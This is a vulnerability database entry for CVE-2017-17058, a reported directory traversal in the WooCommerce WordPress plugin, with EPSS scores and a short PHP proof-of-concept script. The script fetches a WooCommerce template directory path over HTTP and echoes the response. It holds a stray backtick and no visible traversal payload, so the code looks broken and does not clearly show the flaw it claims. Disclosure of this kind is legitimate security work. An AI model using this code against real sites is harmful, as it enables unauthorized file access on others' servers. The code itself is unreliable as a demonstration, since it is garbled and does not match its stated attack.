Lucene search

K
seebugKnownsecSSV:96910
HistoryDec 01, 2017 - 12:00 a.m.

WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal(CVE-2017-17058)

2017-12-0100:00:00
Knownsec
www.seebug.org
29

EPSS

0.005

Percentile

76.5%


                                                $woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);

$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://".$woo);

echo $result;
                              

EPSS

0.005

Percentile

76.5%